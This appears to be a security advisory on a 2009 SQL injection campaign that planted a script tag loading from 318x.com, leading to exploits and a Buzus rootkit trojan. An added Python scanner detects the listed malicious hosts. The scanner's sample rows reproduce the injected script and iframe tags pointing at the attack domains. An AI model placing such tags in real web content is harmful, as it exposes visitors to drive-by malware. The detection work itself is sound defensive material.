A large-scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009.
Injected iframe – <script src=hxxp://318x.com>
This executes a script that creates a new iframe pointing to 318x.com/a.htm. That iframe (a.htm) does two things:
1. Loads a second iframe from aa1100.2288.org/htmlasp/dasp/alt.html
2. Loads a script: js.tongji.linezing.com/1358779/tongji.js (used for tracking).
The aa1100.2288.org/htmlasp/dasp/alt.html frame:
* Creates a third iframe pointing to aa1100.2288.org/htmlasp/dasp/share.html
* Loads a script: js.tongji.linezing.com/1364067/tongji.js (similar to above, but different number)
* For browsers without scripting (<noscript>), it has an href that points to www.linezing.com with an img src of img.tongji.linezing.com/1364067/tongji.gif
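For site owners checking whether stored content was hit, the following added example (not from ScanSafe or the original write-up) parses HTML fragments and flags script, iframe, img and link elements that load from the hosts named above. The sample rows, the function names and the "malicious"/"tracking" labels are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts named in the write-up; subdomains match too.
IOC_HOSTS = {"318x.com", "aa1100.2288.org"}
# Counter service the write-up says the chain loads for tracking.
TRACKING_HOSTS = {"linezing.com"}

def host_of(url):
    """Lowercase host of a src/href value; '' for relative or malformed URLs."""
    url = url.strip()
    if url.lower().startswith("hxxp"):      # re-fang reports written as hxxp://
        url = "http" + url[4:]
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:
        return ""

def in_set(host, hosts):
    # Exact host or a subdomain of it; "not318x.com" must not match "318x.com".
    return any(host == h or host.endswith("." + h) for h in hosts)

class Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe", "img", "a"):
            return
        for name, value in attrs:
            if name in ("src", "href") and value:
                host = host_of(value)
                if in_set(host, IOC_HOSTS):
                    self.hits.append(("malicious", tag, host))
                elif in_set(host, TRACKING_HOSTS):
                    self.hits.append(("tracking", tag, host))

def scan(html):
    """Return (verdict, tag, host) for each matching element in an HTML fragment."""
    parser = Scanner()
    parser.feed(html)
    parser.close()
    return parser.hits

# Constructed sample values, e.g. text columns dumped from a site's database.
SAMPLES = {
    "product_row": "Blue widget, 20cm<script src=http://318x.com></script>",
    "clean_row": '<p>Opening hours</p><script src="/js/site.js"></script>',
    "frame_page": '<iframe src="http://aa1100.2288.org/htmlasp/dasp/share.html"></iframe>'
                  '<script src="http://js.tongji.linezing.com/1364067/tongji.js"></script>',
    "lookalike": '<script src="http://not318x.com/x.js"></script>',
}
```

A "tracking" hit on its own only shows the counter script is present; treat it as a lead to review alongside any "malicious" hits.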
Observed Exploits Include:
- Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
- MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
- Microsoft Office Web Components vulnerabilities described in MS09-043
- Microsoft video ActiveX vulnerability described in MS09-032
- Internet Explorer uninitialized memory corruption vulnerability described in MS09-002
Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).